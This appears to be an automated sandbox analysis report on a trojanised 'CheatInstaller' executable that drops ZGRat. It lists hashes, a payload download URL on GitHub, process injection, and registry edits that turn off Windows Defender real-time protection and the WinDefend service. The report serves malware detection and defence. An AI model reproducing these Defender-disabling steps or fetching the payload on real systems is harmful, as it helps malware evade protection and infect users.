Resubmissions
18-03-2024 19:24
240318-x4seaaha4x 1018-03-2024 19:06
240318-xsb8xsfh83 1018-03-2024 14:42
240318-r3a6qabc38 10Analysis
-
max time kernel
1620s -
max time network
1808s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
18-03-2024 19:24
Static task
static1
Behavioral task
behavioral1
Sample
RUN.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
RUN.exe
Resource
win10-20240221-en
Behavioral task
behavioral3
Sample
RUN.exe
Resource
win10v2004-20240226-en
General
-
Target
RUN.exe
-
Size
31.7MB
-
MD5
41bf2693033eaed432dfa5c1d75cdeec
-
SHA1
ff038cb9e992a518106c80868176785e987c301d
-
SHA256
148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
-
SHA512
f8ffe83afac20f3fc2b0175542e0e98cc236d3ab6e6cdf7d3702b5b124af6b64e8edd2d6ddddda6bdf6a2288f8853c56fed3bcf490227a0867baeb2bf8cb80ff
-
SSDEEP
786432:ELlFuTirkoTj4mAJidZgSekJEUlvgBNTTz+Ndz+t:fqjzddlekmg4LU+t
Malware Config
Extracted
https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip
Signatures
-
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral2/memory/2896-4335-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4337-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4343-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4348-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4347-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4345-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4349-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4351-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4354-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4355-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4362-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4361-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4368-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4370-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4377-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4375-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4364-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4383-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4382-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4389-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4387-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4395-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4394-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4393-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4378-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4403-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4402-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4405-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4409-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4411-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4407-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/3044-4416-0x0000000004F80000-0x00000000051FF000-memory.dmp family_zgrat_v1 behavioral2/memory/2896-4414-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp family_zgrat_v1 behavioral2/memory/3016-4415-0x00000000051E0000-0x0000000005450000-memory.dmp family_zgrat_v1 -
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
EdUpdMachine.exedescription pid process target process PID 4208 created 3384 4208 EdUpdMachine.exe Explorer.EXE PID 4208 created 3384 4208 EdUpdMachine.exe Explorer.EXE PID 4208 created 3384 4208 EdUpdMachine.exe Explorer.EXE -
Drops file in Drivers directory 1 IoCs
Processes:
EdUpdMachine.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts EdUpdMachine.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 12 IoCs
Processes:
Install_YTTCHTs.exeMSID293.tmpwinserverupd.exeMSI24F.tmpMSI251.tmpMSI250.tmpEdUpdMachine.exeNarsil.exeSurrogateServerIntoSvc.exeEdUpdMachine.exeNarsil.exeSurrogateServerIntoSvc.exepid process 4596 Install_YTTCHTs.exe 1308 MSID293.tmp 5004 winserverupd.exe 1368 MSI24F.tmp 4784 MSI251.tmp 3928 MSI250.tmp 2896 EdUpdMachine.exe 3044 Narsil.exe 3016 SurrogateServerIntoSvc.exe 4208 EdUpdMachine.exe 4356 Narsil.exe 2328 SurrogateServerIntoSvc.exe -
Loads dropped DLL 25 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 3640 MsiExec.exe 3640 MsiExec.exe 3640 MsiExec.exe 3640 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 2236 MsiExec.exe 4764 MsiExec.exe 4764 MsiExec.exe 4764 MsiExec.exe 4764 MsiExec.exe 4764 MsiExec.exe 4764 MsiExec.exe 2236 MsiExec.exe 4764 MsiExec.exe -
Blocklisted process makes network request 2 IoCs
Processes:
MsiExec.exeflow pid process 6 4764 MsiExec.exe 8 4764 MsiExec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeInstall_YTTCHTs.exedescription ioc process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: Install_YTTCHTs.exe File opened (read-only) \??\V: Install_YTTCHTs.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: Install_YTTCHTs.exe File opened (read-only) \??\S: Install_YTTCHTs.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: Install_YTTCHTs.exe File opened (read-only) \??\L: Install_YTTCHTs.exe File opened (read-only) \??\M: Install_YTTCHTs.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: Install_YTTCHTs.exe File opened (read-only) \??\T: Install_YTTCHTs.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: Install_YTTCHTs.exe File opened (read-only) \??\W: Install_YTTCHTs.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: Install_YTTCHTs.exe File opened (read-only) \??\J: Install_YTTCHTs.exe File opened (read-only) \??\N: Install_YTTCHTs.exe File opened (read-only) \??\Y: Install_YTTCHTs.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: Install_YTTCHTs.exe File opened (read-only) \??\O: Install_YTTCHTs.exe File opened (read-only) \??\X: Install_YTTCHTs.exe File opened (read-only) \??\U: Install_YTTCHTs.exe File opened (read-only) \??\E: Install_YTTCHTs.exe File opened (read-only) \??\H: Install_YTTCHTs.exe File opened (read-only) \??\R: Install_YTTCHTs.exe File opened (read-only) \??\Z: Install_YTTCHTs.exe File opened (read-only) \??\Q: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 22 pastebin.com 23 pastebin.com 5 raw.githubusercontent.com -
Drops file in System32 directory 6 IoCs
Processes:
MsiExec.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 MsiExec.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
EdUpdMachine.exeEdUpdMachine.exeNarsil.exeSurrogateServerIntoSvc.exedescription pid process target process PID 2896 set thread context of 4208 2896 EdUpdMachine.exe EdUpdMachine.exe PID 4208 set thread context of 4212 4208 EdUpdMachine.exe svchost.exe PID 3044 set thread context of 4356 3044 Narsil.exe Narsil.exe PID 3016 set thread context of 2328 3016 SurrogateServerIntoSvc.exe SurrogateServerIntoSvc.exe -
Drops file in Program Files directory 38 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav msiexec.exe File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav msiexec.exe -
Drops file in Windows directory 33 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\e58466a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI491A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7F29.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI250.tmp msiexec.exe File created C:\Windows\Installer\e58466e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI251.tmp msiexec.exe File opened for modification C:\Windows\Installer\e58466a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8075.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8151.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8171.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8309.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI7E7C.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI7F78.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID293.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID2A3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4BDC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4CA8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4D84.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC77.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI24F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64C8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4B2F.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} msiexec.exe File opened for modification C:\Windows\Installer\MSI7FC7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4A53.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6330.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI641B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7E6B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI82E9.tmp msiexec.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2528 sc.exe 4312 sc.exe 544 sc.exe 192 sc.exe 1092 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1372 timeout.exe -
Modifies data under HKEY_USERS 24 IoCs
Processes:
MsiExec.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MsiExec.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" MsiExec.exe -
Modifies registry class 26 IoCs
Processes:
msiexec.exereg.exeSurrogateServerIntoSvc.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings SurrogateServerIntoSvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" msiexec.exe -
Runs ping.exe 1 TTPs 64 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3568 PING.EXE 4476 PING.EXE 3600 PING.EXE 5108 PING.EXE 4280 PING.EXE 556 PING.EXE 1152 PING.EXE 3940 PING.EXE 1652 PING.EXE 728 PING.EXE 5060 PING.EXE 4836 PING.EXE 212 PING.EXE 4476 PING.EXE 2328 PING.EXE 560 PING.EXE 1104 PING.EXE 404 PING.EXE 4776 PING.EXE 2360 PING.EXE 4996 PING.EXE 4712 PING.EXE 2340 PING.EXE 4652 PING.EXE 4476 PING.EXE 192 PING.EXE 4176 PING.EXE 1284 PING.EXE 196 PING.EXE 428 PING.EXE 2480 PING.EXE 2468 PING.EXE 3704 PING.EXE 3460 PING.EXE 2020 PING.EXE 2328 PING.EXE 5068 PING.EXE 5116 PING.EXE 3728 PING.EXE 992 PING.EXE 1344 PING.EXE 4952 PING.EXE 992 PING.EXE 3728 PING.EXE 4744 PING.EXE 1068 PING.EXE 4304 PING.EXE 3116 PING.EXE 1108 PING.EXE 2500 PING.EXE 4984 PING.EXE 3940 PING.EXE 4132 PING.EXE 4252 PING.EXE 4836 PING.EXE 4184 PING.EXE 4584 PING.EXE 4444 PING.EXE 4616 PING.EXE 2528 PING.EXE 3620 PING.EXE 2020 PING.EXE 2128 PING.EXE 2360 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEdUpdMachine.exepowershell.exesvchost.exepid process 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 4292 msiexec.exe 4292 msiexec.exe 540 powershell.exe 4332 powershell.exe 540 powershell.exe 540 powershell.exe 540 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 32 powershell.exe 32 powershell.exe 32 powershell.exe 32 powershell.exe 1080 powershell.exe 1080 powershell.exe 1080 powershell.exe 1080 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 232 powershell.exe 232 powershell.exe 232 powershell.exe 4544 powershell.exe 4544 powershell.exe 4544 powershell.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 4208 EdUpdMachine.exe 4208 EdUpdMachine.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4208 EdUpdMachine.exe 4208 EdUpdMachine.exe 4208 EdUpdMachine.exe 4208 EdUpdMachine.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe 4212 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
SurrogateServerIntoSvc.exepid process 2328 SurrogateServerIntoSvc.exe -
Suspicious behavior: LoadsDriver 5 IoCs
